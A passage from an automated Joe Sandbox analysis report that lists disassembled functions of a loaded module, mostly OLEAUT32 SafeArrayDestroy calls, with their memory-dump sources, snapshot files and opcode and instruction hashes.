                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: d696beee0e5334a9fd623a9d49d1c7adaf1114efadd673d975b06f29358b3eee
                                                                                                          • Instruction ID: ff46b4a8652641be79349c2a3d344cfab2f6348350083abd5c8762d5eaa5fde1
                                                                                                          • Opcode Fuzzy Hash: d696beee0e5334a9fd623a9d49d1c7adaf1114efadd673d975b06f29358b3eee
                                                                                                          • Instruction Fuzzy Hash: 75310874A00618DFCB00DFA9CD80B9EB7F9AF89300F20859AE518E7255DB75E9818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F049237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 0f9169d6dd7ac4e7a51b2a854e244ae6bc4d52618dc0242c9d72595d0d65cc6a
                                                                                                          • Instruction ID: 29eac61e707e063d3fe625504ecf5c0ad67756131c9fc4679be1320e5068608f
                                                                                                          • Opcode Fuzzy Hash: 0f9169d6dd7ac4e7a51b2a854e244ae6bc4d52618dc0242c9d72595d0d65cc6a
                                                                                                          • Instruction Fuzzy Hash: 4D312A74E01618DFDB00DFA9CD80B9EB7FAAF89200F2085A6E419E7255DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0492C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 7745afb02cef6d107832ec8e3d051f1f161a3b11505ec4f21a91717a5a4edcc4
                                                                                                          • Instruction ID: 4853136db669e7f56f17648764fb38ab0f2dcc572bfac40ef853710032d330df
                                                                                                          • Opcode Fuzzy Hash: 7745afb02cef6d107832ec8e3d051f1f161a3b11505ec4f21a91717a5a4edcc4
                                                                                                          • Instruction Fuzzy Hash: E5312874E00618DFDB10DFA9C980B9EB7FAAF89200F2085AAE419E7255DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F049118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: ad769ec9be3bbced46f9fa734889f22adf0cbd1cc13f93e0103c02431a6c38b4
                                                                                                          • Instruction ID: 0701a6df376ae04058d95930d99cc13e730f3d1efa725b3ef0d8c8c557ec7bb4
                                                                                                          • Opcode Fuzzy Hash: ad769ec9be3bbced46f9fa734889f22adf0cbd1cc13f93e0103c02431a6c38b4
                                                                                                          • Instruction Fuzzy Hash: 88314B74E00608DFCB00DF69CD80B9EB7FAAF89200F6085AAE419E7255CB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0491A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 0435cedffad78d234ac40eb5449d18430b924d8393a87725d300db7c43a8294c
                                                                                                          • Instruction ID: 7836c39a81f6e534ed87fdaf08fe88ea9def33f5706cd10d6d444e9d1d831adb
                                                                                                          • Opcode Fuzzy Hash: 0435cedffad78d234ac40eb5449d18430b924d8393a87725d300db7c43a8294c
                                                                                                          • Instruction Fuzzy Hash: A5313974E00618DFCB00DFA9CD80B9EB7FAAF89200F6085AAE419E7255DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: e96e2eca0e2d7ca0be7b944a99aa381f59e2c3f7c0902e9ffcc814601cdfcdea
                                                                                                          • Instruction ID: 0fb9f3eb4dc89bd08d9d33eeb16af0e6b88454985ce740cc06bd406aa79c84e0
                                                                                                          • Opcode Fuzzy Hash: e96e2eca0e2d7ca0be7b944a99aa381f59e2c3f7c0902e9ffcc814601cdfcdea
                                                                                                          • Instruction Fuzzy Hash: D7312A74E00618DFCB10DF69CD80B9EB7FAAF89200F2085AAE529E7255D775E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04C180
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6F043749,?), ref: 6F04C1B8
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C1C4
                                                                                                          • VariantCopy.OLEAUT32(6F043749,?), ref: 6F04C21B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C22F
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F04C23E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 3979206172-0
                                                                                                          • Opcode ID: e59645ff6559e8f238cb129a2f23aa989783a715c29ff11070eaccca09b51382
                                                                                                          • Instruction ID: ec3309f60bd35f72929ff18d0cbde479a20f62214ff5e245f1cc1810f51fcc54
                                                                                                          • Opcode Fuzzy Hash: e59645ff6559e8f238cb129a2f23aa989783a715c29ff11070eaccca09b51382
                                                                                                          • Instruction Fuzzy Hash: 40316D75A04609EFDB01DFA4C884B9EBBB8FF49314F108129E915D7350EB35E905CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 79a3ce9ab7c6a9e89ee98d5686098d86db9f2d2ca532bdc28ea09398d2748601
                                                                                                          • Instruction ID: 9857d4b461a32e5ef6700ad142cb34cfec1720f9445d377ad738b9bbd2728040
                                                                                                          • Opcode Fuzzy Hash: 79a3ce9ab7c6a9e89ee98d5686098d86db9f2d2ca532bdc28ea09398d2748601
                                                                                                          • Instruction Fuzzy Hash: 11311C70E00618DFCB10DF69CC80B9DB7FABF85200F6046AAE429E7255C771E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 7cfdbd85884e4dda2bb05af684976910bc6654d6e23fd1a701fcde357eaca674
                                                                                                          • Instruction ID: ad34567c62dff6723ce2570beadcef9be24a774ee951bf386aae59d72ec5a4f3
                                                                                                          • Opcode Fuzzy Hash: 7cfdbd85884e4dda2bb05af684976910bc6654d6e23fd1a701fcde357eaca674
                                                                                                          • Instruction Fuzzy Hash: 88311A70E01618DFCB10DF69CC80B9EB7FABF85200F6086AAE429E7255D775E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: f251e82f89945f95f441bb26d6f6ff787d456b5ffebd08cbd0e684f12e6ff961
                                                                                                          • Instruction ID: 0641801585daea554ed3b119799531426599297c10debd880f4d022120479362
                                                                                                          • Opcode Fuzzy Hash: f251e82f89945f95f441bb26d6f6ff787d456b5ffebd08cbd0e684f12e6ff961
                                                                                                          • Instruction Fuzzy Hash: 22311870E01618DFDB10DF69CC80B9EB7FABF85200F6485AAE429E7255CB75E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 2f26af9af0ac68871a69f629a45148ace86807f10eabb0dd4b174ca04502becb
                                                                                                          • Instruction ID: c1a92d2c61a6d1d0448eecae7de668b9601d85bcccbe8de50a2a77648fbd2733
                                                                                                          • Opcode Fuzzy Hash: 2f26af9af0ac68871a69f629a45148ace86807f10eabb0dd4b174ca04502becb
                                                                                                          • Instruction Fuzzy Hash: 35311870E01618DFCB10DFA9CC80B9EB7FABF95200F6485AAE429E7255CB75E9418F50
                                                                                                          Uniqueness

